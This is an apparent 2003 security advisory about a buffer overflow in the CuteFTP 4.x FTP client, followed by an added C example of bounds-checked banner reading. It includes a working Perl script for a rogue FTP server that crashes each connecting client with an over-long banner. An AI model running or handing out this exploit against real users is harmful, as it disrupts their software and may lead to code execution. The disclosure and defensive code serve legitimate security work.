CuteFTP: buffer overflow

From: D4rkGr3y (grey_1999at_private)
Date: Sat Jan 04 2003 - 05:01:26 PST


    #####################################################*
    #      Damage Hacking Group security advisory
    #                 www.dhgroup.org
    #####################################################*
    #Product: CuteFTP client
    #Authors: GlobalSCAPE Inc. [www.globalscape.com]
    #Vulnerable versions: v.4.*
    #Vulnerability: buffer overflow
    #####################################################*
    
    #Overview#--------------------------------------------------------------#
    "CuteFTP is a Windows based File Transfer Protocol (FTP) client that
    allows users to utilize the capabilities of FTP without having to
    know all the details of the protocol itself. CuteFTP simplifies FTP
    by offering a user-friendly Windows interface instead of a cumbersome
    command line utility.  CuteFTP gives novice PC users the ability to
    upload, download and edit files on remote FTP servers around the world."
    
    #Problem#---------------------------------------------------------------#
    It's possible to crash CuteFTP (and run shellcode(?)) by sending a
    long (>2048b) ftp-banner to it. As you understand, this problem could
    be used by an FTP server.
    
    #Fix#--------------------------------------------------------------------#
    Download the new version from www.globalscape.com.
    
    #Exploit#----------------------------------------------------------------#
    
    #!/usr/bin/perl
    ######################################################
    #Here is an example of an ftp-server. It will freeze each
    #CuteFTP user that tries to connect to it.
    #######################################################
    use IO::Socket;
    $port = "21";      # standard FTP control port
    $data = "a";       # filler byte
    $num = "2049";     # one byte past the 2048-byte limit described above
    $buf .= $data x $num;
    # Listen for incoming FTP control connections
    $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
    or die "Couldn't create tcp-server.\n";
    while ($client = $server->accept()) {
     print "Client connected.\n";
     print "Attacking...";
     # Send the over-long string in place of the normal greeting banner
     print $client "$buf";
     print "OK\n";
     close($client);
    }
    #EOF
    
    Best regards               www.dhgroup.org
      D4rkGr3y                    icq 540981
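
Added example (not part of the original advisory and not CuteFTP's code): a client-side reader that checks the length of a server greeting before copying it into a fixed buffer, so an over-long banner is rejected instead of written past the end. The 2048-byte cap mirrors the threshold reported in the advisory and is an assumption; the function and constant names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: cap mirrors the >2048-byte threshold in the advisory;
   it is not a value taken from CuteFTP's source. */
#define BANNER_CAP 2048
enum { BANNER_TOO_LONG = -1, BANNER_INCOMPLETE = -2 };  /* hypothetical names */

/*
 * Copy one LF- or CRLF-terminated reply line from `in` (bytes received so
 * far) into `out`, which holds `out_cap` bytes including the NUL.
 * Returns the line length without the terminator, BANNER_INCOMPLETE if the
 * terminator has not arrived yet, or BANNER_TOO_LONG if the line cannot
 * fit, in which case the caller should drop the connection.
 */
int read_banner_line(const unsigned char *in, size_t in_len,
                     char *out, size_t out_cap)
{
    if (out == NULL || out_cap == 0)
        return BANNER_TOO_LONG;
    for (size_t i = 0; i < in_len; i++) {
        if (in[i] == '\n') {
            size_t n = i;
            if (n > 0 && in[n - 1] == '\r')
                n--;                      /* strip the CR of CRLF */
            if (n >= out_cap)             /* no room for the NUL */
                return BANNER_TOO_LONG;
            memcpy(out, in, n);
            out[n] = '\0';
            return (int)n;
        }
        if (i >= out_cap)                 /* already longer than any valid line */
            return BANNER_TOO_LONG;
    }
    return BANNER_INCOMPLETE;
}

int main(void)
{
    unsigned char banner[2049];           /* constructed sample: 2049 x 'a' */
    char line[BANNER_CAP];
    memset(banner, 'a', sizeof banner);
    int rc = read_banner_line(banner, sizeof banner, line, sizeof line);
    printf("oversized banner -> %d (drop the connection)\n", rc);
    return 0;
}
```
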
    


